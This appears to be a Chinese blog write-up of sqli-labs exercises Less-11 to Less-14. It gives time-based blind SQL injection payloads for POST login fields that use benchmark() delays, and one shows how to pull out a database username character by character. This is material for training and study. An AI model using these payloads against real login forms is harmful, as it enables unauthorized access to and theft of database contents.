Less-11~14

admin 2021年9月1日15:01:22评论68 views字数 824阅读2分44秒阅读模式

Less-11
这个页面采用POST的方法得到数据。于是用HackBar修改post数据进行测试:

uname=admin&passwd=password' and benchmark(10000000,sha(1))#&submit=Submit

测试发现,这个格式的注入使得服务器返回页面变慢,得知之后的benchmark语句得到执行。
所以再构造类似于

uname=admin&passwd=password' and left(version(),1)=5 and benchmark(10000000,sha(1))#&submit=Submit

的语句。如果返回结果变慢,则前面的left函数得到的结果是正确的,才会运行之后的benchmark函数。通过这种方法,可以一点一点地得到数据库的数据。
示例:

uname=admin&passwd=password' and left((select username from users where id = 1),4)='Dumb' and benchmark(10000000,sha(1))#&submit=Submit

Less-12
同上:

password") and benchmark(10000000,sha(1))#&submit=Submit

Less-13

password') and benchmark(10000000,sha(1))#&submit=Submit

Less-14

password" and benchmark(10000000,sha(1))#&submit=Submit

FROM :rickyhao.com | rickyhao.com

相关推荐: WeChall 总结

恕我孤陋寡闻,这几天才知道有WeChall这个神奇的网站。这个网站算是一个CTF刷题的站吧。有各种题目,还会搜集其他有CTF的网站。当然,应该还有其他这种类型的网站,嗯,求告诉~ 那么,就开始啦~ Training: Get Sourced 这题就是简单地查看…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年9月1日15:01:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Less-11~14http://cn-sec.com/archives/499797.html

发表评论

匿名网友 填写信息